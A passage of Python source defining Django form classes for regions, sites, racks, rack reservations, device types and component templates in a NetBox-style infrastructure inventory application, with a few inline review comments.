    """Form field which accepts a MAC address and normalizes it to an EUI object."""
    widget = forms.CharField
    default_error_messages = {
        'invalid': 'MAC address must be in EUI-48 format',
    }

    def to_python(self, value):
        value = super().to_python(value)

        # Parse the value as an EUI, surfacing a form error on malformed input
        try:
            return EUI(value.strip())
        except AddrFormatError:
            raise forms.ValidationError(self.error_messages['invalid'], code='invalid')
#
# Regions
#
class RegionForm(BootstrapMixin, forms.ModelForm):
    """Form for creating/editing a Region."""
    parent = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False
    )
    slug = SlugField()
    class Meta:
        model = Region
        fields = (
            'parent', 'name', 'slug', 'description',
        )
class RegionCSVForm(CSVModelForm):
    """CSV bulk-import form for Regions; the parent region is referenced by name."""
    parent = CSVModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Name of parent region'
    )
    class Meta:
        model = Region
        fields = Region.csv_headers
class RegionFilterForm(BootstrapMixin, forms.Form):
    """Filter form for the Region list view (free-text search only)."""
    # NOTE(review): model is Site rather than Region — verify this is intentional
    model = Site
    q = forms.CharField(
        required=False,
        label='Search'
    )
#
# Sites
#
class SiteForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
    """Form for creating/editing a Site, including tenancy and custom-field support."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False
    )
    slug = SlugField()
    comments = CommentField()
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = Site
        fields = [
            'name', 'slug', 'status', 'region', 'tenant_group', 'tenant', 'facility', 'asn', 'time_zone', 'description',
            'physical_address', 'shipping_address', 'latitude', 'longitude', 'contact_name', 'contact_phone',
            'contact_email', 'comments', 'tags',
        ]
        widgets = {
            'physical_address': SmallTextarea(
                attrs={
                    'rows': 3,
                }
            ),
            'shipping_address': SmallTextarea(
                attrs={
                    'rows': 3,
                }
            ),
            'status': StaticSelect2(),
            'time_zone': StaticSelect2(),
        }
        help_texts = {
            'name': "Full name of the site",
            'facility': "Data center provider and facility (e.g. Equinix NY7)",
            'asn': "BGP autonomous system number",
            'time_zone': "Local time zone",
            'description': "Short description (will appear in sites list)",
            'physical_address': "Physical location of the building (e.g. for GPS)",
            'shipping_address': "If different from the physical address",
            'latitude': "Latitude in decimal format (xx.yyyyyy)",
            'longitude': "Longitude in decimal format (xx.yyyyyy)"
        }
class SiteCSVForm(CustomFieldModelCSVForm):
    """CSV bulk-import form for Sites; region and tenant are referenced by name."""
    status = CSVChoiceField(
        choices=SiteStatusChoices,
        required=False,
        help_text='Operational status'
    )
    region = CSVModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Assigned region'
    )
    tenant = CSVModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Assigned tenant'
    )
    class Meta:
        model = Site
        fields = Site.csv_headers
        help_texts = {
            'time_zone': mark_safe(
                'Time zone (<a href="https://en.wikipedia.org/wiki/List_of_tz_database_time_zones">available options</a>)'
            )
        }
class SiteBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk-edit form for Sites; fields in Meta.nullable_fields may be cleared."""
    # Hidden field carrying the set of selected Site PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=Site.objects.all(),
        widget=forms.MultipleHiddenInput
    )
    status = forms.ChoiceField(
        choices=add_blank_choice(SiteStatusChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False
    )
    tenant = DynamicModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False
    )
    asn = forms.IntegerField(
        min_value=BGP_ASN_MIN,
        max_value=BGP_ASN_MAX,
        required=False,
        label='ASN'
    )
    description = forms.CharField(
        max_length=100,
        required=False
    )
    time_zone = TimeZoneFormField(
        choices=add_blank_choice(TimeZoneFormField().choices),
        required=False,
        widget=StaticSelect2()
    )
    class Meta:
        nullable_fields = [
            'region', 'tenant', 'asn', 'description', 'time_zone',
        ]
class SiteFilterForm(BootstrapMixin, TenancyFilterForm, CustomFieldFilterForm):
    """Filter form for the Site list view."""
    model = Site
    field_order = ['q', 'status', 'region', 'tenant_group', 'tenant']
    q = forms.CharField(
        required=False,
        label='Search'
    )
    status = forms.MultipleChoiceField(
        choices=SiteStatusChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    tag = TagFilterField(model)
#
# Rack groups
#
class RackGroupForm(BootstrapMixin, forms.ModelForm):
    """Form for creating/editing a RackGroup; region/site/parent selectors chain together."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        # Pre-select the region of the initial site
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        query_params={
            'region_id': '$region'
        }
    )
    parent = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        # Parent group must belong to the selected site
        query_params={
            'site_id': '$site'
        }
    )
    slug = SlugField()
    class Meta:
        model = RackGroup
        fields = (
            'region', 'site', 'parent', 'name', 'slug', 'description',
        )
class RackGroupCSVForm(CSVModelForm):
    """CSV bulk-import form for RackGroups; site and parent group are referenced by name."""
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name',
        help_text='Assigned site'
    )
    parent = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Parent rack group',
        error_messages={
            'invalid_choice': 'Rack group not found.',
        }
    )
    class Meta:
        model = RackGroup
        fields = RackGroup.csv_headers
class RackGroupFilterForm(BootstrapMixin, forms.Form):
    """Filter form for the RackGroup list view."""
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    parent = DynamicModelMultipleChoiceField(
        queryset=RackGroup.objects.all(),
        to_field_name='slug',
        required=False,
        # Parent choices follow the selected region(s) and site(s)
        query_params={
            'region': '$region',
            'site': '$site',
        }
    )
#
# Rack roles
#
class RackRoleForm(BootstrapMixin, forms.ModelForm):
    """Form for creating/editing a RackRole."""
    slug = SlugField()
    class Meta:
        model = RackRole
        fields = [
            'name', 'slug', 'color', 'description',
        ]
class RackRoleCSVForm(CSVModelForm):
    """CSV bulk-import form for RackRoles."""
    slug = SlugField()
    class Meta:
        model = RackRole
        fields = RackRole.csv_headers
        help_texts = {
            'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
        }
#
# Racks
#
class RackForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
    """Form for creating/editing a Rack; region/site/group selectors chain together."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        # Pre-select the region of the initial site
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        query_params={
            'region_id': '$region'
        }
    )
    group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )
    role = DynamicModelChoiceField(
        queryset=RackRole.objects.all(),
        required=False
    )
    comments = CommentField()
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = Rack
        fields = [
            'region', 'site', 'group', 'name', 'facility_id', 'tenant_group', 'tenant', 'status', 'role', 'serial',
            'asset_tag', 'type', 'width', 'u_height', 'desc_units', 'outer_width', 'outer_depth', 'outer_unit',
            'comments', 'tags',
        ]
        help_texts = {
            'site': "The site at which the rack exists",
            'name': "Organizational rack name",
            'facility_id': "The unique rack ID assigned by the facility",
            'u_height': "Height in rack units",
        }
        widgets = {
            'status': StaticSelect2(),
            'type': StaticSelect2(),
            'width': StaticSelect2(),
            'outer_unit': StaticSelect2(),
        }
class RackCSVForm(CustomFieldModelCSVForm):
    """CSV bulk-import form for Racks; related objects are referenced by name."""
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name'
    )
    group = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        to_field_name='name'
    )
    tenant = CSVModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Name of assigned tenant'
    )
    status = CSVChoiceField(
        choices=RackStatusChoices,
        required=False,
        help_text='Operational status'
    )
    role = CSVModelChoiceField(
        queryset=RackRole.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Name of assigned role'
    )
    type = CSVChoiceField(
        choices=RackTypeChoices,
        required=False,
        help_text='Rack type'
    )
    width = forms.ChoiceField(
        choices=RackWidthChoices,
        help_text='Rail-to-rail width (in inches)'
    )
    outer_unit = CSVChoiceField(
        choices=RackDimensionUnitChoices,
        required=False,
        help_text='Unit for outer dimensions'
    )
    class Meta:
        model = Rack
        fields = Rack.csv_headers
    def __init__(self, data=None, *args, **kwargs):
        """Narrow the group queryset to the site named in the submitted row, if any."""
        super().__init__(data, *args, **kwargs)
        if data:
            # Limit group queryset by assigned site
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['group'].queryset = self.fields['group'].queryset.filter(**params)
class RackBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk-edit form for Racks; fields in Meta.nullable_fields may be cleared."""
    # Hidden field carrying the set of selected Rack PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=Rack.objects.all(),
        widget=forms.MultipleHiddenInput
    )
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        # Pre-select the region of the initial site
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        query_params={
            'region_id': '$region'
        }
    )
    group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )
    tenant = DynamicModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False
    )
    status = forms.ChoiceField(
        choices=add_blank_choice(RackStatusChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    role = DynamicModelChoiceField(
        queryset=RackRole.objects.all(),
        required=False
    )
    serial = forms.CharField(
        max_length=50,
        required=False,
        label='Serial Number'
    )
    asset_tag = forms.CharField(
        max_length=50,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(RackTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    width = forms.ChoiceField(
        choices=add_blank_choice(RackWidthChoices),
        required=False,
        widget=StaticSelect2()
    )
    u_height = forms.IntegerField(
        required=False,
        label='Height (U)'
    )
    desc_units = forms.NullBooleanField(
        required=False,
        widget=BulkEditNullBooleanSelect,
        label='Descending units'
    )
    outer_width = forms.IntegerField(
        required=False,
        min_value=1
    )
    outer_depth = forms.IntegerField(
        required=False,
        min_value=1
    )
    outer_unit = forms.ChoiceField(
        choices=add_blank_choice(RackDimensionUnitChoices),
        required=False,
        widget=StaticSelect2()
    )
    comments = CommentField(
        widget=SmallTextarea,
        label='Comments'
    )
    class Meta:
        nullable_fields = [
            'group', 'tenant', 'role', 'serial', 'asset_tag', 'outer_width', 'outer_depth', 'outer_unit', 'comments',
        ]
class RackFilterForm(BootstrapMixin, TenancyFilterForm, CustomFieldFilterForm):
    """Filter form for the Rack list view."""
    model = Rack
    field_order = ['q', 'region', 'site', 'group_id', 'status', 'role', 'tenant_group', 'tenant']
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    group_id = DynamicModelMultipleChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        label='Rack group',
        null_option='None',
        query_params={
            'site': '$site'
        }
    )
    status = forms.MultipleChoiceField(
        choices=RackStatusChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    type = forms.MultipleChoiceField(
        choices=RackTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    width = forms.MultipleChoiceField(
        choices=RackWidthChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    role = DynamicModelMultipleChoiceField(
        queryset=RackRole.objects.all(),
        to_field_name='slug',
        required=False,
        null_option='None'
    )
    tag = TagFilterField(model)
#
# Rack elevations
#
class RackElevationFilterForm(RackFilterForm):
    """Filter form for rack elevations; extends RackFilterForm with selection of specific racks."""
    field_order = ['q', 'region', 'site', 'group_id', 'id', 'status', 'role', 'tenant_group', 'tenant']
    id = DynamicModelMultipleChoiceField(
        queryset=Rack.objects.all(),
        label='Rack',
        required=False,
        display_field='display_name',
        # Rack choices follow the selected site(s) and group(s)
        query_params={
            'site': '$site',
            'group_id': '$group_id',
        }
    )
#
# Rack reservations
#
class RackReservationForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
    """Form for creating/editing a RackReservation; rack selection is narrowed via region/site/group."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        query_params={
            'region_id': '$region'
        }
    )
    rack_group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        display_field='display_name',
        query_params={
            'site_id': '$site',
            'group_id': '$rack_group',
        }
    )
    units = NumericArrayField(
        base_field=forms.IntegerField(),
        help_text="Comma-separated list of numeric unit IDs. A range may be specified using a hyphen."
    )
    user = forms.ModelChoiceField(
        queryset=User.objects.order_by(
            'username'
        ),
        widget=StaticSelect2()
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = RackReservation
        fields = [
            'rack', 'units', 'user', 'tenant_group', 'tenant', 'description', 'tags',
        ]
class RackReservationCSVForm(CustomFieldModelCSVForm):
    """CSV bulk-import form for RackReservations; related objects are referenced by name."""
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name',
        help_text='Parent site'
    )
    rack_group = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        to_field_name='name',
        required=False,
        help_text="Rack's group (if any)"
    )
    rack = CSVModelChoiceField(
        queryset=Rack.objects.all(),
        to_field_name='name',
        help_text='Rack'
    )
    units = SimpleArrayField(
        base_field=forms.IntegerField(),
        required=True,
        help_text='Comma-separated list of individual unit numbers'
    )
    tenant = CSVModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Assigned tenant'
    )
    class Meta:
        model = RackReservation
        fields = ('site', 'rack_group', 'rack', 'units', 'tenant', 'description')
    def __init__(self, data=None, *args, **kwargs):
        """Narrow the rack_group and rack querysets to the site/group named in the submitted row."""
        super().__init__(data, *args, **kwargs)
        if data:
            # Limit rack_group queryset by assigned site
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
            # Limit rack queryset by assigned site and group
            params = {
                f"site__{self.fields['site'].to_field_name}": data.get('site'),
                f"group__{self.fields['rack_group'].to_field_name}": data.get('rack_group'),
            }
            self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class RackReservationBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk-edit form for RackReservations."""
    # Hidden field carrying the set of selected RackReservation PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=RackReservation.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    user = forms.ModelChoiceField(
        queryset=User.objects.order_by(
            'username'
        ),
        required=False,
        widget=StaticSelect2()
    )
    tenant = DynamicModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False
    )
    description = forms.CharField(
        max_length=100,
        required=False
    )
    class Meta:
        nullable_fields = []
class RackReservationFilterForm(BootstrapMixin, TenancyFilterForm):
    """Filter form for the RackReservation list view."""
    model = RackReservation
    field_order = ['q', 'region', 'site', 'group_id', 'user_id', 'tenant_group', 'tenant']
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    group_id = DynamicModelMultipleChoiceField(
        queryset=RackGroup.objects.prefetch_related('site'),
        required=False,
        label='Rack group',
        null_option='None'
    )
    user_id = DynamicModelMultipleChoiceField(
        queryset=User.objects.all(),
        required=False,
        display_field='username',
        label='User',
        widget=APISelectMultiple(
            api_url='/api/users/users/',
        )
    )
    tag = TagFilterField(model)
#
# Manufacturers
#
class ManufacturerForm(BootstrapMixin, forms.ModelForm):
    """Form for creating/editing a Manufacturer."""
    slug = SlugField()
    class Meta:
        model = Manufacturer
        fields = [
            'name', 'slug', 'description',
        ]
class ManufacturerCSVForm(CSVModelForm):
    """CSV bulk-import form for Manufacturers."""
    class Meta:
        model = Manufacturer
        fields = Manufacturer.csv_headers
#
# Device types
#
class DeviceTypeForm(BootstrapMixin, CustomFieldModelForm):
    """Form for creating/editing a DeviceType."""
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all()
    )
    # Slug is auto-populated from the model name
    slug = SlugField(
        slug_source='model'
    )
    comments = CommentField()
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = DeviceType
        fields = [
            'manufacturer', 'model', 'slug', 'part_number', 'u_height', 'is_full_depth', 'subdevice_role',
            'front_image', 'rear_image', 'comments', 'tags',
        ]
        widgets = {
            'subdevice_role': StaticSelect2(),
            # Exclude SVG images (unsupported by PIL)
            'front_image': forms.FileInput(attrs={
                'accept': 'image/bmp,image/gif,image/jpeg,image/png,image/tiff'
            }),
            'rear_image': forms.FileInput(attrs={
                'accept': 'image/bmp,image/gif,image/jpeg,image/png,image/tiff'
            })
        }
class DeviceTypeImportForm(BootstrapMixin, forms.ModelForm):
    """Form for importing a DeviceType definition; the manufacturer is referenced by name."""
    manufacturer = forms.ModelChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='name'
    )
    class Meta:
        model = DeviceType
        fields = [
            'manufacturer', 'model', 'slug', 'part_number', 'u_height', 'is_full_depth', 'subdevice_role',
            'comments',
        ]
class DeviceTypeBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk-edit form for DeviceTypes."""
    # Hidden field carrying the set of selected DeviceType PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=DeviceType.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    u_height = forms.IntegerField(
        min_value=1,
        required=False
    )
    is_full_depth = forms.NullBooleanField(
        required=False,
        widget=BulkEditNullBooleanSelect(),
        label='Is full depth'
    )
    class Meta:
        nullable_fields = []
class DeviceTypeFilterForm(BootstrapMixin, CustomFieldFilterForm):
    """Filter form for the DeviceType list view, including has-component toggles."""
    model = DeviceType
    q = forms.CharField(
        required=False,
        label='Search'
    )
    manufacturer = DynamicModelMultipleChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='slug',
        required=False
    )
    subdevice_role = forms.MultipleChoiceField(
        choices=add_blank_choice(SubdeviceRoleChoices),
        required=False,
        widget=StaticSelect2Multiple()
    )
    # Tri-state (yes/no/any) filters on the presence of each component type
    console_ports = forms.NullBooleanField(
        required=False,
        label='Has console ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    console_server_ports = forms.NullBooleanField(
        required=False,
        label='Has console server ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    power_ports = forms.NullBooleanField(
        required=False,
        label='Has power ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    power_outlets = forms.NullBooleanField(
        required=False,
        label='Has power outlets',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    interfaces = forms.NullBooleanField(
        required=False,
        label='Has interfaces',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    pass_through_ports = forms.NullBooleanField(
        required=False,
        label='Has pass-through ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    tag = TagFilterField(model)
#
# Device component templates
#
class ComponentTemplateCreateForm(ComponentForm):
    """
    Base form for the creation of device component templates (subclassed from ComponentTemplateModel).
    """
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False,
        # Pre-select the manufacturer of the initial device type
        initial_params={
            'device_types': 'device_type'
        }
    )
    device_type = DynamicModelChoiceField(
        queryset=DeviceType.objects.all(),
        display_field='model',
        query_params={
            'manufacturer_id': '$manufacturer'
        }
    )
    description = forms.CharField(
        required=False
    )
class ConsolePortTemplateForm(BootstrapMixin, forms.ModelForm):
    """Form for editing a single ConsolePortTemplate; the parent device type is fixed."""
    class Meta:
        model = ConsolePortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
        }
class ConsolePortTemplateCreateForm(ComponentTemplateCreateForm):
    """Form for creating one or more ConsolePortTemplates from a name pattern."""
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        widget=StaticSelect2()
    )
    field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'description')
class ConsolePortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """Bulk-edit form for ConsolePortTemplates."""
    # Hidden field carrying the set of selected ConsolePortTemplate PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=ConsolePortTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    # Fix: Meta.nullable_fields already listed 'description', but the field itself was missing,
    # so the description could never be bulk-edited. Matches the sibling BulkEdit forms.
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'type', 'description')
class ConsoleServerPortTemplateForm(BootstrapMixin, forms.ModelForm):
    """Form for editing a single ConsoleServerPortTemplate; the parent device type is fixed."""
    class Meta:
        model = ConsoleServerPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
        }
class ConsoleServerPortTemplateCreateForm(ComponentTemplateCreateForm):
    """Form for creating one or more ConsoleServerPortTemplates from a name pattern."""
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        widget=StaticSelect2()
    )
    field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'description')
class ConsoleServerPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """Bulk-edit form for ConsoleServerPortTemplates."""
    # Hidden field carrying the set of selected ConsoleServerPortTemplate PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=ConsoleServerPortTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'type', 'description')
class PowerPortTemplateForm(BootstrapMixin, forms.ModelForm):
    """Form for editing a single PowerPortTemplate; the parent device type is fixed."""
    class Meta:
        model = PowerPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
        }
class PowerPortTemplateCreateForm(ComponentTemplateCreateForm):
    """Form for creating one or more PowerPortTemplates from a name pattern."""
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerPortTypeChoices),
        required=False
    )
    maximum_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Maximum power draw (watts)"
    )
    allocated_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Allocated power draw (watts)"
    )
    field_order = (
        'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw',
        'description',
    )
class PowerPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """Bulk-edit form for PowerPortTemplates."""
    # Hidden field carrying the set of selected PowerPortTemplate PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerPortTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerPortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    maximum_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Maximum power draw (watts)"
    )
    allocated_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Allocated power draw (watts)"
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'type', 'maximum_draw', 'allocated_draw', 'description')
class PowerOutletTemplateForm(BootstrapMixin, forms.ModelForm):
    """Form for editing a single PowerOutletTemplate; power_port choices are scoped to the parent device type."""
    class Meta:
        model = PowerOutletTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
        }
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Limit power_port choices to current DeviceType
        if hasattr(self.instance, 'device_type'):
            self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(
                device_type=self.instance.device_type
            )
class PowerOutletTemplateCreateForm(ComponentTemplateCreateForm):
    """Form for creating one or more PowerOutletTemplates from a name pattern."""
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletTypeChoices),
        required=False
    )
    power_port = forms.ModelChoiceField(
        queryset=PowerPortTemplate.objects.all(),
        required=False
    )
    feed_leg = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletFeedLegChoices),
        required=False,
        widget=StaticSelect2()
    )
    field_order = (
        'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'power_port', 'feed_leg',
        'description',
    )
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Limit power_port choices to current DeviceType
        # NOTE(review): raises DoesNotExist if neither initial nor submitted data names a device_type — confirm callers always supply one
        device_type = DeviceType.objects.get(
            pk=self.initial.get('device_type') or self.data.get('device_type')
        )
        self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(
            device_type=device_type
        )
class PowerOutletTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """Bulk-edit form for PowerOutletTemplates; power_port choices are scoped to the parent device type."""
    # Hidden field carrying the set of selected PowerOutletTemplate PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerOutletTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    device_type = forms.ModelChoiceField(
        queryset=DeviceType.objects.all(),
        required=False,
        disabled=True,
        widget=forms.HiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    power_port = forms.ModelChoiceField(
        queryset=PowerPortTemplate.objects.all(),
        required=False
    )
    feed_leg = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletFeedLegChoices),
        required=False,
        widget=StaticSelect2()
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'type', 'power_port', 'feed_leg', 'description')
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Limit power_port queryset to PowerPortTemplates which belong to the parent DeviceType
        if 'device_type' in self.initial:
            device_type = DeviceType.objects.filter(pk=self.initial['device_type']).first()
            self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(device_type=device_type)
        else:
            self.fields['power_port'].choices = ()
            self.fields['power_port'].widget.attrs['disabled'] = True
class InterfaceTemplateForm(BootstrapMixin, forms.ModelForm):
    """Form for editing a single InterfaceTemplate; the parent device type is fixed."""
    class Meta:
        model = InterfaceTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'mgmt_only', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
            'type': StaticSelect2(),
        }
class InterfaceTemplateCreateForm(ComponentTemplateCreateForm):
    """Form for creating one or more InterfaceTemplates from a name pattern."""
    type = forms.ChoiceField(
        choices=InterfaceTypeChoices,
        widget=StaticSelect2()
    )
    mgmt_only = forms.BooleanField(
        required=False,
        label='Management only'
    )
    field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'mgmt_only', 'description')
class InterfaceTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """Bulk-edit form for InterfaceTemplates."""
    # Hidden field carrying the set of selected InterfaceTemplate PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=InterfaceTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(InterfaceTypeChoices),
        required=False,
